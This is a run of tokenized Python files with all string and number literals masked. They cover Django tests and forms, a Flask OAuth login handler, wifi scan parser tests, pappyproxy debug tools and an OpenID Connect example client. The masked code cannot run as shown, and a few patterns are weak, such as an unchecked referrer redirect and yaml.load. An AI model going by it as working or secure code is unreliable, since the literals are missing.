. channel ] ) <EOL> def test_get_descendants ( self ) : <EOL> self . assertEqual ( list ( self . parent . get_descendants ( ) ) , <EOL> [ self . parent , self . channel ] ) <EOL> def test_absolute_urls ( self ) : <EOL> self . assertEqual ( self . channel . get_absolute_url ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( self . parent . get_absolute_url ( ) , <EOL> '<STR_LIT>' ) <EOL> def test_get_canonical_url ( self ) : <EOL> self . assertEqual ( self . channel . get_canonical_url ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( self . parent . get_canonical_url ( ) , <EOL> '<STR_LIT>' ) <EOL> class TestConfig ( BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> self . config , new = Config . objects . get_or_create ( <EOL> group = '<STR_LIT:test>' , <EOL> ) <EOL> self . config . values . append ( CustomValue ( name = '<STR_LIT>' , <EOL> rawvalue = u'<STR_LIT>' , <EOL> formatter = '<STR_LIT:text>' ) ) <EOL> def tearDown ( self ) : <EOL> self . config . delete ( ) <EOL> def test_config_fields ( self ) : <EOL> self . assertEqual ( self . config . group , u'<STR_LIT:test>' ) <EOL> self . assertEqual ( self . config . content_format , '<STR_LIT>' ) <EOL> self . assertFalse ( self . config . published ) <EOL> self . assertTrue ( self . config . values . count ( ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( unicode ( self . config ) , u'<STR_LIT:test>' ) <EOL> self . assertEqual ( self . config . values [ <NUM_LIT:0> ] . value , u'<STR_LIT>' ) </s>
<s> from flask import request , session , redirect , current_app , url_for <EOL> from flask . ext . security . utils import login_user <EOL> from . models import User , Connection <EOL> def clean_sessions ( ) : <EOL> for provider in current_app . config . get ( "<STR_LIT>" , { } ) : <EOL> session . pop ( '<STR_LIT>' % provider , None ) <EOL> session . pop ( '<STR_LIT>' % provider , None ) <EOL> def get_oauth_app ( provider ) : <EOL> provider_name = "<STR_LIT>" + provider <EOL> return getattr ( current_app , provider_name , None ) <EOL> def oauth_login ( provider ) : <EOL> oauth_app = get_oauth_app ( provider ) <EOL> clean_sessions ( ) <EOL> if provider == '<STR_LIT>' : <EOL> _next = None <EOL> else : <EOL> _next = request . args . get ( '<STR_LIT>' , request . referrer ) or None <EOL> return oauth_app . authorize ( <EOL> callback = url_for ( <EOL> '<STR_LIT>' . format ( provider ) , <EOL> _external = True , <EOL> next = _next <EOL> ) <EOL> ) <EOL> def make_oauth_handler ( provider ) : <EOL> def oauth_handler ( resp ) : <EOL> app = current_app <EOL> oauth_app = get_oauth_app ( provider ) <EOL> if not oauth_app : <EOL> return "<STR_LIT>" <EOL> oauth_app . tokengetter ( <EOL> lambda : session . get ( "<STR_LIT>" + provider + "<STR_LIT>" ) <EOL> ) <EOL> if resp is None : <EOL> return '<STR_LIT>' % ( <EOL> request . args [ '<STR_LIT>' ] , <EOL> request . args [ '<STR_LIT>' ] <EOL> ) <EOL> session [ "<STR_LIT>" + provider + "<STR_LIT>" ] = ( resp [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> data = app . config . get ( "<STR_LIT>" , { } ) . get ( provider ) <EOL> me = oauth_app . get ( data . get ( '<STR_LIT>' ) ) <EOL> if not any ( [ me . data . get ( '<STR_LIT>' ) , <EOL> me . data . get ( '<STR_LIT>' ) ] ) : <EOL> return "<STR_LIT>" <EOL> email = me . data . get ( '<STR_LIT:email>' ) <EOL> name = me . data . get ( '<STR_LIT:name>' ) <EOL> provider_user_id = me . data . get ( '<STR_LIT:id>' ) <EOL> profile_url = me . data . get ( '<STR_LIT>' ) <EOL> access_token = resp [ '<STR_LIT>' ] <EOL> try : <EOL> user = User . objects . get ( email = email ) <EOL> except User . DoesNotExist : <EOL> user = User ( <EOL> name = name , <EOL> email = email , <EOL> username = User . generate_username ( email ) <EOL> ) <EOL> user . save ( ) <EOL> try : <EOL> connection = Connection . objects . get ( <EOL> user_id = str ( user . id ) , <EOL> provider_id = provider , <EOL> ) <EOL> connection . access_token = access_token <EOL> connection . save ( ) <EOL> except Connection . DoesNotExist : <EOL> connection = Connection ( <EOL> user_id = str ( user . id ) , <EOL> provider_id = provider , <EOL> provider_user_id = provider_user_id , <EOL> profile_url = profile_url , <EOL> access_token = access_token <EOL> ) <EOL> connection . save ( ) <EOL> login_user ( user ) <EOL> _next = request . args . get ( <EOL> '<STR_LIT>' , request . referrer <EOL> ) or session . get ( <EOL> '<STR_LIT>' <EOL> ) or app . config . get ( '<STR_LIT>' , "<STR_LIT:/>" ) <EOL> return redirect ( _next ) <EOL> return oauth_handler </s>
<s> import pytz <EOL> from django . core . exceptions import ValidationError <EOL> from django . utils . translation import ugettext_lazy , ugettext as _ <EOL> from . models import ( Project , UserProfile , Package , ProjectDependency , <EOL> ProjectMember ) <EOL> from . utils . forms import ModelForm , JabberField <EOL> from . utils . parsers import get_parser , get_parser_choices <EOL> from . utils . pypi import normalize_name <EOL> from . tasks import sync_project <EOL> import floppyforms as forms <EOL> TIMEZONES = pytz . common_timezones <EOL> class AddProjectForm ( ModelForm ) : <EOL> requirements = forms . FileField ( required = False ) <EOL> parser = forms . ChoiceField ( choices = get_parser_choices ( ) ) <EOL> class Meta : <EOL> model = Project <EOL> fields = ( '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . user = kwargs . pop ( '<STR_LIT:user>' ) <EOL> super ( AddProjectForm , self ) . __init__ ( * args , ** kwargs ) <EOL> def clean ( self ) : <EOL> cleaned_data = self . cleaned_data <EOL> data = cleaned_data . get ( '<STR_LIT>' , None ) <EOL> project_deps = [ ] <EOL> if data and '<STR_LIT>' in cleaned_data : <EOL> parser = get_parser ( cleaned_data [ '<STR_LIT>' ] ) <EOL> packages , missing = parser . parse ( data ) <EOL> packages = dict ( ( normalize_name ( k ) , v ) for k , v <EOL> in packages . iteritems ( ) ) <EOL> pkg_names = [ normalize_name ( name ) for name in packages . keys ( ) ] <EOL> known_packages = Package . objects . filter ( normalized_name__in = pkg_names ) . values_list ( '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> known_package_names = map ( lambda x : x [ <NUM_LIT:1> ] , known_packages ) <EOL> normalized = ( normalize_name ( n ) for n in known_package_names ) <EOL> missing . extend ( set ( pkg_names ) . difference ( normalized ) ) <EOL> for normalized , name , pk in known_packages : <EOL> project_deps . append ( <EOL> ProjectDependency ( package_id = pk , <EOL> version = packages [ normalized ] ) ) <EOL> cleaned_data [ '<STR_LIT>' ] = project_deps <EOL> return cleaned_data <EOL> def save ( self , commit = True ) : <EOL> project = super ( AddProjectForm , self ) . save ( True ) <EOL> project . create_logentry ( '<STR_LIT>' , '<STR_LIT>' , self . user , name = project . name ) <EOL> ProjectMember . objects . create ( user = self . user , state = ProjectMember . OWNER , <EOL> project = project ) <EOL> deps = self . cleaned_data [ '<STR_LIT>' ] <EOL> for dep in deps : <EOL> dep . project = project <EOL> ProjectDependency . objects . bulk_create ( deps ) <EOL> sync_project . delay ( project . pk ) <EOL> return project <EOL> class ProjectDependencyForm ( ModelForm ) : <EOL> class Meta : <EOL> model = ProjectDependency <EOL> fields = ( '<STR_LIT:version>' , '<STR_LIT:id>' ) <EOL> class UpdateUserProfileForm ( ModelForm ) : <EOL> timezone = forms . ChoiceField ( label = ugettext_lazy ( '<STR_LIT>' ) , <EOL> required = True , <EOL> choices = zip ( TIMEZONES , TIMEZONES ) ) <EOL> jabber = JabberField ( required = False ) <EOL> email = forms . EmailField ( required = True ) <EOL> class Meta : <EOL> model = UserProfile <EOL> fields = ( '<STR_LIT:email>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> instance = kwargs . get ( '<STR_LIT>' , None ) <EOL> if instance is not None : <EOL> initial = kwargs . setdefault ( '<STR_LIT>' , { } ) <EOL> initial [ '<STR_LIT:email>' ] = instance . user . email <EOL> super ( UpdateUserProfileForm , self ) . __init__ ( * args , ** kwargs ) <EOL> class ProjectMemberForm ( ModelForm ) : <EOL> class Meta : <EOL> model = ProjectMember <EOL> fields = ( '<STR_LIT:id>' , '<STR_LIT:state>' ) <EOL> class CreateProjectMemberForm ( ModelForm ) : <EOL> class Meta : <EOL> model = ProjectMember <EOL> fields = ( '<STR_LIT:user>' , '<STR_LIT:state>' ) <EOL> class UpdateProjectDependencyForm ( forms . Form ) : <EOL> packages = forms . CharField ( widget = forms . Textarea , required = False ) <EOL> parser = forms . ChoiceField ( choices = get_parser_choices ( ) ) <EOL> def clean ( self ) : <EOL> cleaned_data = self . cleaned_data <EOL> if '<STR_LIT>' in cleaned_data and '<STR_LIT>' in cleaned_data : <EOL> data = cleaned_data [ '<STR_LIT>' ] <EOL> parser = get_parser ( cleaned_data [ '<STR_LIT>' ] ) <EOL> packages , missing_packages = parser . parse ( data . splitlines ( ) ) <EOL> pkg_names = [ normalize_name ( name ) for name in packages . keys ( ) ] <EOL> known_packages = set ( <EOL> Package . objects . filter ( normalized_name__in = pkg_names ) <EOL> . values_list ( '<STR_LIT>' , '<STR_LIT:name>' ) ) <EOL> pkg_mapping = dict ( known_packages ) <EOL> unknown_packages = set ( name for name in <EOL> set ( pkg_names ) . difference ( x [ <NUM_LIT:0> ] for x in known_packages ) ) <EOL> if unknown_packages : <EOL> raise ValidationError ( _ ( <EOL> '<STR_LIT>' ) % <EOL> '<STR_LIT:U+002CU+0020>' . join ( unknown_packages ) ) <EOL> if missing_packages : <EOL> raise ValidationError ( _ ( <EOL> '<STR_LIT>' ) % <EOL> '<STR_LIT:U+002CU+0020>' . join ( missing_packages ) ) <EOL> cleaned_data [ '<STR_LIT>' ] = packages <EOL> return cleaned_data </s>
<s> from unittest import TestCase <EOL> from wifi . scan import Cell <EOL> from wifi . exceptions import InterfaceError <EOL> class IWListParserTest ( TestCase ) : <EOL> def test_no_encryption ( self ) : <EOL> cell = Cell . from_string ( IWLIST_SCAN_NO_ENCRYPTION ) <EOL> self . assertFalse ( cell . encrypted ) <EOL> self . assertEqual ( cell . ssid , '<STR_LIT>' ) <EOL> self . assertEqual ( cell . signal , - <NUM_LIT> ) <EOL> self . assertEqual ( cell . quality , '<STR_LIT>' ) <EOL> self . assertEqual ( cell . frequency , '<STR_LIT>' ) <EOL> self . assertEqual ( cell . mode , '<STR_LIT>' ) <EOL> self . assertEqual ( cell . channel , <NUM_LIT:6> ) <EOL> def test_wep ( self ) : <EOL> cell = Cell . from_string ( IWLIST_SCAN_WEP ) <EOL> self . assertTrue ( cell . encrypted ) <EOL> self . assertEqual ( cell . encryption_type , '<STR_LIT>' ) <EOL> def test_wpa2 ( self ) : <EOL> cell = Cell . from_string ( IWLIST_SCAN_WPA2 ) <EOL> self . assertTrue ( cell . encrypted ) <EOL> self . assertEqual ( cell . encryption_type , '<STR_LIT>' ) <EOL> def test_wpa1 ( self ) : <EOL> cell = Cell . from_string ( IWLIST_SCAN_WPA1 ) <EOL> self . assertTrue ( cell . encrypted ) <EOL> self . assertEqual ( cell . encryption_type , '<STR_LIT>' ) <EOL> def test_alternative_iwlist_output ( self ) : <EOL> cell = Cell . from_string ( ALTERNATIVE_OUTPUT ) <EOL> self . assertEqual ( cell . quality , '<STR_LIT>' ) <EOL> self . assertEqual ( cell . signal , - <NUM_LIT> ) <EOL> def test_signal_level_out_of_sixty ( self ) : <EOL> cell = Cell . from_string ( ALTERNATIVE_OUTPUT2 ) <EOL> self . assertEqual ( cell . signal , - <NUM_LIT> ) <EOL> def test_noname_cell ( self ) : <EOL> cell = Cell . from_string ( NONAME_WIRELESS_NETWORK ) <EOL> self . assertEqual ( cell . ssid , '<STR_LIT>' ) <EOL> def test_no_channel_output ( self ) : <EOL> cell = Cell . from_string ( NO_CHANNEL_OUTPUT ) <EOL> self . assertEqual ( cell . channel , <NUM_LIT:11> ) <EOL> def test_list_index_error ( self ) : <EOL> cell = Cell . from_string ( LIST_INDEX_ERROR ) <EOL> def test_frequency_no_channel_output ( self ) : <EOL> cell = Cell . from_string ( FREQUENCY_NO_CHANNEL_OUTPUT ) <EOL> self . assertEqual ( cell . channel , <NUM_LIT> ) <EOL> def test_absolute_quality ( self ) : <EOL> cell = Cell . from_string ( ABSOLUTE_QUALITY ) <EOL> self . assertEqual ( cell . quality , '<STR_LIT>' ) <EOL> self . assertEqual ( cell . signal , - <NUM_LIT> ) <EOL> def test_blank_ssid ( self ) : <EOL> cell = Cell . from_string ( NO_SSID_AT_ALL ) <EOL> self . assertEqual ( cell . ssid , None ) <EOL> def test_noise_no_data ( self ) : <EOL> cell = Cell . from_string ( IWLIST_SCAN_NO_ENCRYPTION ) <EOL> self . assertEqual ( cell . noise , None ) <EOL> def test_noise_data_present ( self ) : <EOL> cell = Cell . from_string ( LIST_INDEX_ERROR ) <EOL> self . assertEqual ( cell . noise , - <NUM_LIT> ) <EOL> class ScanningTest ( TestCase ) : <EOL> def test_scanning ( self ) : <EOL> self . assertRaises ( InterfaceError , Cell . all , '<STR_LIT>' ) <EOL> IWLIST_SCAN_NO_ENCRYPTION = """<STR_LIT>""" <EOL> IWLIST_SCAN_WEP = """<STR_LIT>""" <EOL> IWLIST_SCAN_WPA2 = """<STR_LIT>""" <EOL> IWLIST_SCAN_WPA1 = """<STR_LIT>""" <EOL> ALTERNATIVE_OUTPUT = """<STR_LIT>""" <EOL> ALTERNATIVE_OUTPUT2 = """<STR_LIT>""" <EOL> NONAME_WIRELESS_NETWORK = """<STR_LIT>""" <EOL> NO_CHANNEL_OUTPUT = """<STR_LIT>""" <EOL> LIST_INDEX_ERROR = """<STR_LIT>""" <EOL> FREQUENCY_NO_CHANNEL_OUTPUT = """<STR_LIT>""" <EOL> ABSOLUTE_QUALITY = """<STR_LIT>""" <EOL> NO_SSID_AT_ALL = """<STR_LIT>""" </s>
<s> import gc <EOL> import shlex <EOL> import code <EOL> import crochet <EOL> import os <EOL> import resource <EOL> import random <EOL> import datetime <EOL> from pappyproxy . http import Request , post_request <EOL> from pappyproxy . util import PappyException <EOL> from pappyproxy . requestcache import RequestCache <EOL> from pappyproxy . util import print_requests <EOL> from pappyproxy . pappy import heapstats , session <EOL> from pappyproxy . plugin import require_modules <EOL> from twisted . internet import defer <EOL> def cache_info ( line ) : <EOL> c = Request . cache <EOL> print '<STR_LIT>' % ( len ( c . _cached_reqs ) , c . _cache_size ) <EOL> print '<STR_LIT>' . format ( c . hit_ratio , c . hits , c . hits + c . misses ) <EOL> print '<STR_LIT>' <EOL> if line != '<STR_LIT:q>' : <EOL> rl = [ v for k , v in Request . cache . _cached_reqs . iteritems ( ) ] <EOL> rs = sorted ( rl , key = lambda r : Request . cache . _last_used [ r . reqid ] , reverse = True ) <EOL> print_requests ( rs ) <EOL> @ require_modules ( '<STR_LIT>' ) <EOL> def memory_info ( line ) : <EOL> import psutil <EOL> proc = psutil . Process ( os . getpid ( ) ) <EOL> mem = proc . memory_info ( ) . rss <EOL> megabyte = ( float ( mem ) / <NUM_LIT> ) / <NUM_LIT> <EOL> print '<STR_LIT>' . format ( megabyte , mem ) <EOL> @ require_modules ( '<STR_LIT>' ) <EOL> def heap_info ( line ) : <EOL> size = heapstats . heap ( ) . size <EOL> print '<STR_LIT>' . format ( size / ( <NUM_LIT> * <NUM_LIT> ) ) <EOL> print heapstats . heap ( ) <EOL> def limit_info ( line ) : <EOL> rsrc = resource . RLIMIT_AS <EOL> soft , hard = resource . getrlimit ( rsrc ) <EOL> print '<STR_LIT>' , soft <EOL> print '<STR_LIT>' , hard <EOL> if line : <EOL> limit_mb = int ( line ) <EOL> limit_kb = int ( line ) * <NUM_LIT> <EOL> print '<STR_LIT>' % limit_mb <EOL> resource . setrlimit ( rsrc , ( limit_kb , hard ) ) <EOL> soft , hard = resource . getrlimit ( rsrc ) <EOL> print '<STR_LIT>' , soft <EOL> print '<STR_LIT>' , hard <EOL> @ require_modules ( '<STR_LIT>' ) <EOL> def graph_randobj ( line ) : <EOL> import objgraph <EOL> args = shlex . split ( line ) <EOL> if len ( args ) > <NUM_LIT:1> : <EOL> fname = args [ <NUM_LIT:1> ] <EOL> else : <EOL> fname = '<STR_LIT>' <EOL> print '<STR_LIT>' % args [ <NUM_LIT:0> ] <EOL> obj = random . choice ( objgraph . by_type ( args [ <NUM_LIT:0> ] ) ) <EOL> print '<STR_LIT>' <EOL> chain = objgraph . find_backref_chain ( obj , objgraph . is_proper_module ) <EOL> print '<STR_LIT>' <EOL> objgraph . show_chain ( chain , filename = fname ) <EOL> def heapdo ( line ) : <EOL> if heapstats is None : <EOL> raise PappyException ( '<STR_LIT>' ) <EOL> h = heapstats . heap ( ) <EOL> code . interact ( local = locals ( ) ) <EOL> def collect ( line ) : <EOL> gc . collect ( ) <EOL> @ crochet . wait_for ( timeout = None ) <EOL> @ defer . inlineCallbacks <EOL> def loadblock ( line ) : <EOL> args = shlex . split ( line ) <EOL> yield Request . cache . load ( args [ <NUM_LIT:0> ] , int ( args [ <NUM_LIT:1> ] ) ) <EOL> @ crochet . wait_for ( timeout = None ) <EOL> @ defer . inlineCallbacks <EOL> def big_fucking_data_file ( line ) : <EOL> print "<STR_LIT>" <EOL> for i in range ( <NUM_LIT:1000> ) : <EOL> if i % <NUM_LIT:20> == <NUM_LIT:0> : <EOL> print '<STR_LIT>' % i <EOL> r = post_request ( '<STR_LIT>' ) <EOL> r . body = '<STR_LIT:A>' * ( <NUM_LIT> * <NUM_LIT> ) <EOL> yield r . async_deep_save ( ) <EOL> def time_cmd ( line ) : <EOL> print '<STR_LIT>' % line <EOL> start = datetime . datetime . now ( ) <EOL> session . cons . onecmd ( line . strip ( ) ) <EOL> end = datetime . datetime . now ( ) <EOL> total_time = ( end - start ) . total_seconds ( ) <EOL> print '<STR_LIT>' . format ( line , total_time ) <EOL> def cache_data ( line ) : <EOL> args = shlex . split ( line ) <EOL> reqid = args [ <NUM_LIT:0> ] <EOL> cached = reqid in Request . cache . _cached_reqs <EOL> if reqid in Request . cache . _last_used : <EOL> last_used = Request . cache . _last_used [ reqid ] <EOL> else : <EOL> last_used = '<STR_LIT>' <EOL> in_all = reqid in Request . cache . all_ids <EOL> in_unmangled = reqid in Request . cache . unmangled_ids <EOL> try : <EOL> ordered_ids_pos = Request . cache . ordered_ids . index ( reqid ) <EOL> except ValueError : <EOL> ordered_ids_pos = '<STR_LIT>' <EOL> in_inmem = reqid in Request . cache . inmem_reqs <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' % reqid <EOL> print '<STR_LIT>' % cached <EOL> print '<STR_LIT>' % last_used <EOL> print '<STR_LIT>' % in_all <EOL> print '<STR_LIT>' % in_unmangled <EOL> print '<STR_LIT>' % ordered_ids_pos <EOL> print '<STR_LIT>' % in_inmem <EOL> print '<STR_LIT>' <EOL> def check_cache ( line ) : <EOL> Request . cache . assert_ids ( ) <EOL> def load_cmds ( cmd ) : <EOL> cmd . set_cmds ( { <EOL> '<STR_LIT>' : ( cache_info , None ) , <EOL> '<STR_LIT>' : ( heap_info , None ) , <EOL> '<STR_LIT>' : ( limit_info , None ) , <EOL> '<STR_LIT>' : ( heapdo , None ) , <EOL> '<STR_LIT>' : ( collect , None ) , <EOL> '<STR_LIT>' : ( graph_randobj , None ) , <EOL> '<STR_LIT>' : ( memory_info , None ) , <EOL> '<STR_LIT>' : ( big_fucking_data_file , None ) , <EOL> '<STR_LIT>' : ( check_cache , None ) , <EOL> '<STR_LIT>' : ( loadblock , None ) , <EOL> '<STR_LIT:time>' : ( time_cmd , None ) , <EOL> '<STR_LIT>' : ( cache_data , None ) , <EOL> } ) <EOL> cmd . add_aliases ( [ <EOL> ] ) </s>
<s> import os <EOL> import pytest <EOL> import random <EOL> import string <EOL> from pappyproxy . session import Session <EOL> from pappyproxy . crypto import Crypto <EOL> from pappyproxy . config import PappyConfig <EOL> @ pytest . fixture <EOL> def conf ( ) : <EOL> c = PappyConfig ( ) <EOL> return c <EOL> @ pytest . fixture <EOL> def crypt ( ) : <EOL> c = Crypto ( conf ( ) ) <EOL> return c <EOL> @ pytest . fixture <EOL> def tmpname ( ) : <EOL> cns = string . ascii_lowercase + string . ascii_uppercase + string . digits <EOL> tn = '<STR_LIT>' <EOL> for i in xrange ( <NUM_LIT:8> ) : <EOL> tn += cns [ random . randint ( <NUM_LIT:0> , len ( cns ) - <NUM_LIT:1> ) ] <EOL> return tn <EOL> tmpdir = '<STR_LIT>' + tmpname ( ) <EOL> tmpfiles = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> tmp_pass = '<STR_LIT>' <EOL> def stub_files ( ) : <EOL> enter_tmpdir ( ) <EOL> for sf in tmpfiles : <EOL> with os . fdopen ( os . open ( sf , os . O_CREAT , <NUM_LIT> ) , '<STR_LIT:r>' ) : <EOL> pass <EOL> def enter_tmpdir ( ) : <EOL> if not os . path . isdir ( tmpdir ) : <EOL> os . mkdir ( tmpdir ) <EOL> os . chdir ( tmpdir ) <EOL> def test_decrypt_tmpdir ( ) : <EOL> enter_tmpdir ( ) <EOL> c = crypt ( ) <EOL> c . password = tmp_pass <EOL> c . decrypt_project ( ) <EOL> assert os . path . isdir ( os . path . join ( os . getcwd ( ) , '<STR_LIT>' ) ) <EOL> def test_decrypt_copy_files ( ) : <EOL> enter_tmpdir ( ) <EOL> stub_files ( ) <EOL> c = crypt ( ) <EOL> c . password = tmp_pass <EOL> c . decrypt_project ( ) <EOL> for tf in tmpfiles : <EOL> assert os . path . isfile ( os . path . join ( os . getcwd ( ) , tf ) ) </s>
<s> import argparse <EOL> import cherrypy <EOL> import os <EOL> from oic . oauth2 import rndstr <EOL> from oic . oic import Client <EOL> from oic . oic . message import AuthorizationResponse <EOL> import yaml <EOL> __author__ = '<STR_LIT>' <EOL> class OIDCExampleRP ( object ) : <EOL> def __init__ ( self , client_metadata , behaviour ) : <EOL> self . client_metadata = client_metadata <EOL> self . behaviour = behaviour <EOL> self . redirect_uri = self . client_metadata [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> self . response_type = self . client_metadata [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> self . behaviour = self . behaviour <EOL> def register_with_dynamic_provider ( self , session , uid ) : <EOL> issuer_url = session [ "<STR_LIT>" ] . wf . discovery_query ( uid ) <EOL> provider_info = session [ "<STR_LIT>" ] . provider_config ( issuer_url ) <EOL> session [ "<STR_LIT>" ] . register ( provider_info [ "<STR_LIT>" ] , <EOL> ** self . client_metadata ) <EOL> def make_authentication_request ( self , session ) : <EOL> session [ "<STR_LIT:state>" ] = rndstr ( ) <EOL> session [ "<STR_LIT>" ] = rndstr ( ) <EOL> request_args = { <EOL> "<STR_LIT>" : self . response_type , <EOL> "<STR_LIT:state>" : session [ "<STR_LIT:state>" ] , <EOL> "<STR_LIT>" : session [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : self . redirect_uri <EOL> } <EOL> request_args . update ( self . behaviour ) <EOL> auth_req = session [ "<STR_LIT>" ] . construct_AuthorizationRequest ( <EOL> request_args = request_args ) <EOL> login_url = auth_req . request ( session [ "<STR_LIT>" ] . authorization_endpoint ) <EOL> raise cherrypy . HTTPRedirect ( login_url , <NUM_LIT> ) <EOL> def parse_authentication_response ( self , session , query_string ) : <EOL> auth_response = session [ "<STR_LIT>" ] . parse_response ( AuthorizationResponse , <EOL> info = query_string , <EOL> sformat = "<STR_LIT>" ) <EOL> if auth_response [ "<STR_LIT:state>" ] != session [ "<STR_LIT:state>" ] : <EOL> raise "<STR_LIT>" <EOL> if "<STR_LIT>" in auth_response and auth_response [ "<STR_LIT>" ] [ "<STR_LIT>" ] != session [ "<STR_LIT>" ] : <EOL> raise "<STR_LIT>" <EOL> return auth_response <EOL> def make_token_request ( self , session , auth_code ) : <EOL> args = { <EOL> "<STR_LIT:code>" : auth_code , <EOL> "<STR_LIT>" : self . redirect_uri , <EOL> "<STR_LIT>" : session [ "<STR_LIT>" ] . client_id , <EOL> "<STR_LIT>" : session [ "<STR_LIT>" ] . client_secret <EOL> } <EOL> token_response = session [ "<STR_LIT>" ] . do_access_token_request ( <EOL> scope = "<STR_LIT>" , <EOL> state = session [ <EOL> "<STR_LIT:state>" ] , <EOL> request_args = args ) <EOL> return token_response <EOL> def make_userinfo_request ( self , session , access_token ) : <EOL> userinfo_response = session [ "<STR_LIT>" ] . do_user_info_request ( <EOL> access_token = access_token ) <EOL> return userinfo_response <EOL> class RPServer ( object ) : <EOL> def __init__ ( self , client_metadata , behaviour , verify_ssl ) : <EOL> self . rp = OIDCExampleRP ( client_metadata , behaviour ) <EOL> self . verify_ssl = verify_ssl <EOL> @ cherrypy . expose <EOL> def index ( self ) : <EOL> return self . _load_HTML_page_from_file ( "<STR_LIT>" ) <EOL> @ cherrypy . expose <EOL> def authenticate ( self , uid ) : <EOL> cherrypy . session [ "<STR_LIT>" ] = Client ( verify_ssl = self . verify_ssl ) <EOL> self . rp . register_with_dynamic_provider ( cherrypy . session , uid ) <EOL> redirect_url = self . rp . make_authentication_request ( cherrypy . session ) <EOL> raise cherrypy . HTTPRedirect ( redirect_url , <NUM_LIT> ) <EOL> @ cherrypy . expose <EOL> def repost_fragment ( self , ** kwargs ) : <EOL> response = self . rp . parse_authentication_response ( cherrypy . session , <EOL> kwargs [ "<STR_LIT>" ] ) <EOL> html_page = self . _load_HTML_page_from_file ( "<STR_LIT>" ) <EOL> authz_code = None <EOL> try : <EOL> authz_code = response [ "<STR_LIT:code>" ] <EOL> except KeyError : <EOL> pass <EOL> access_token = None <EOL> try : <EOL> access_token = response [ "<STR_LIT>" ] <EOL> userinfo = self . rp . make_userinfo_request ( cherrypy . session , <EOL> access_token ) <EOL> except KeyError : <EOL> pass <EOL> return html_page . format ( authz_code , access_token , <EOL> response [ "<STR_LIT>" ] , userinfo ) <EOL> @ cherrypy . expose <EOL> def code_flow ( self , ** kwargs ) : <EOL> if "<STR_LIT:error>" in kwargs : <EOL> raise cherrypy . HTTPError ( <NUM_LIT> , "<STR_LIT>" . format ( kwargs [ "<STR_LIT:error>" ] , <EOL> kwargs [ <EOL> "<STR_LIT>" ] ) ) <EOL> qs = cherrypy . request . query_string <EOL> auth_response = self . rp . parse_authentication_response ( cherrypy . session , <EOL> qs ) <EOL> auth_code = auth_response [ "<STR_LIT:code>" ] <EOL> token_response = self . rp . make_token_request ( cherrypy . session , auth_code ) <EOL> userinfo = self . rp . make_userinfo_request ( cherrypy . session , <EOL> token_response [ "<STR_LIT>" ] ) <EOL> html_page = self . _load_HTML_page_from_file ( "<STR_LIT>" ) <EOL> return html_page . format ( auth_code , token_response [ "<STR_LIT>" ] , <EOL> token_response [ "<STR_LIT>" ] , userinfo ) <EOL> @ cherrypy . expose <EOL> def implicit_hybrid_flow ( self , ** kwargs ) : <EOL> return self . _load_HTML_page_from_file ( "<STR_LIT>" ) <EOL> def _load_HTML_page_from_file ( self , path ) : <EOL> if not path . startswith ( "<STR_LIT:/>" ) : <EOL> path = os . path . join ( os . path . dirname ( __file__ ) , path ) <EOL> with open ( path , "<STR_LIT:r>" ) as f : <EOL> return f . read ( ) <EOL> def main ( ) : <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , default = <NUM_LIT> , type = int ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , default = "<STR_LIT>" , type = str ) <EOL> parser . add_argument ( "<STR_LIT>" ) <EOL> args = parser . parse_args ( ) <EOL> with open ( args . settings , "<STR_LIT:r>" ) as f : <EOL> settings = yaml . load ( f ) <EOL> baseurl = args . base . rstrip ( "<STR_LIT:/>" ) <EOL> registration_info = settings [ "<STR_LIT>" ] <EOL> registration_info [ "<STR_LIT>" ] = [ url . format ( base = baseurl ) for url in <EOL> registration_info [ "<STR_LIT>" ] ] <EOL> rp_server = RPServer ( registration_info , settings [ "<STR_LIT>" ] , <EOL> settings [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) <EOL> cherrypy . tree . mount ( rp_server , "<STR_LIT:/>" ) <EOL> cherrypy . config . update ( { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : args . port , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> if baseurl . startswith ( "<STR_LIT>" ) : <EOL> cherrypy . config . update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : settings [ "<STR_LIT>" ] [ "<STR_LIT>" ] , <EOL> '<STR_LIT>' : settings [ "<STR_LIT>" ] [ "<STR_LIT:key>" ] , <EOL> '<STR_LIT>' : settings [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> } ) <EOL> cherrypy . engine . start ( ) <EOL> cherrypy . engine . block ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import inspect <EOL> import time <EOL> import urllib <EOL> import json <EOL> import logging <EOL> from future . backports . urllib . parse import urlparse <EOL> import six <EOL> from jwkest import jws <EOL> import sys <EOL> from oic . utils import time_util <EOL> from oic . oauth2 import message <EOL> from oic . exception import InvalidRequest <EOL> from oic . exception import NotForMe <EOL> from oic . exception import MessageException <EOL> from oic . exception import PyoidcError <EOL> from oic . oauth2 . exception import VerificationError <EOL> from oic . oauth2 . message import MissingRequiredValue <EOL> from oic . oauth2 . message import MissingRequiredAttribute <EOL> from oic . oauth2 . message import Message <EOL> from oic . oauth2 . message import SchemeError <EOL> from oic . oauth2 . message import NotAllowedValue <EOL> from oic . oauth2 . message import REQUIRED_LIST_OF_SP_SEP_STRINGS <EOL> from oic . oauth2 . message import SINGLE_OPTIONAL_JSON <EOL> from oic . oauth2 . message import SINGLE_OPTIONAL_STRING <EOL> from oic . oauth2 . message import 